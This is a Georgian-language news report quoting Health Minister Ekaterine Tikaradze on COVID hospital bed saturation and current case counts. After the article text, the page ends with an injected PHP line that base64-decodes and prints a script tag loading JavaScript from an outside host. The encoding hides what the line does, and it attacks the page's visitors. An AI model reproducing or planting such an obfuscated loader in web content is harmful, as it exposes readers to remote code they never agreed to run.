celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით, ქვეყანაში საწოლფონდის მდგომარეობა საკმაოდ რთულია, ის სრულიად გაჯერებულია პაციენტებით.
 
როგორც მინისტრმა საკოორდინაციო სხდომის შემდეგ გამართულ ბრიფინგზე განაცხადა, სამინისტრო არაერთ მეთოდს იყენებს, რათა მოხდეს პაციენტების აქტიური მართვა და აღნიშნავს, რომ დღემდე არც ერთი პაციენტი, ვისაც ჰოსპიტალიზაცია ესაჭიროებოდა, გარეთ არ დარჩენილა.
 
"საწოლფონდის მობილიზაციასთან დაკავშირებით მდგომარეობა არის საკმაოდ რთული. საწოლფონდი სრულად გაჯერებულია პაციენტებით, თუმცა თქვენ იცით, რომ ჩვენ გამოვიყენებთ არა ერთ მეთოდს, რის საშუალებითაც ვახდენთ პაციენტების აქტიურ მართვას და აქტიური ნაკადების მართვას ჰოსპიტალურ სექტორში და მნიშვნელოვანია აღინიშნოს, რომ დღემდე ჯერ არც ერთი პაციენტი ჰოსპიტალში განთავსების გარეშე არ დარჩენილა. ვგულისხმობ იმ პაციენტებს, რომლებსაც კლინიკურად ესაჭიროებათ სტაციონარში მკურნალობა.
 
მნიშვნელოვანია, რომ აღინიშნოს, დღესდღეობით ჩვენ გვაქვს 52 000-ზე მეტი აქტიური შემთხვევა და ამ შემთხვევების ძირითადი ნაწილი იმართება ოჯახის ექიმების მხრიდან ბინაზე, 3 500-მდე ადამიანი არის კოვიდსასტუმროებში განთავსებული, ხოლო დანარჩენი გადიან მკურნალობას ჰოსპიტლებში.
 
ჰოსპიტლებშიც პაციენტების მდგომარეობაც არის, რა თქმა უნდა საყურადღებო, ვინაიდან 1 500 პაციენტზე მეტი მკურნალობს ინტენსიურ საწოლზე, ხოლო 500 პაციენტი გადის რეანიმაციულ საწოლზე მკურნალობას," - განაცხადა ეკატერინე ტიკარაძემ.
1092
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");